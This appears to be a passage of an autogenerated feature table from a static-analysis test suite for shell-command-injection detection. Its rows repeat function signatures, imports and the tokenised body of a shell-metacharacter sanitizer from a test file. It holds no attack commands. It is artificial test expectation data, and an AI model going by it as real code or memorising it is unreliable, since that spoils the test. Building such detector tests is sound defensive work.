autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:395:13:395:16 | '\\n' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:16 | s[i] === '\\'' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:16 | s[i] === '\\'' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:16 | s[i] === '\\'' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:16 | s[i] === '\\'' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:4:396:16 | s[i] === '\\'' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:6:396:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:6:396:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:6:396:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:6:396:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:6:396:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:13:396:16 | '\\'' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:13:396:16 | '\\'' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:13:396:16 | '\\'' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:13:396:16 | '\\'' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:396:13:396:16 | '\\'' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:15 | s[i] === '`' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:15 | s[i] === '`' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:15 | s[i] === '`' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:15 | s[i] === '`' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:4:397:15 | s[i] === '`' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:6:397:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:6:397:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:6:397:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:6:397:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:6:397:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:13:397:15 | '`' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:13:397:15 | '`' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:13:397:15 | '`' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:13:397:15 | '`' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:397:13:397:15 | '`' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:15 | s[i] === '"' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:15 | s[i] === '"' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:15 | s[i] === '"' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:15 | s[i] === '"' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:4:398:15 | s[i] === '"' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:6:398:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:6:398:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:6:398:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:6:398:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| 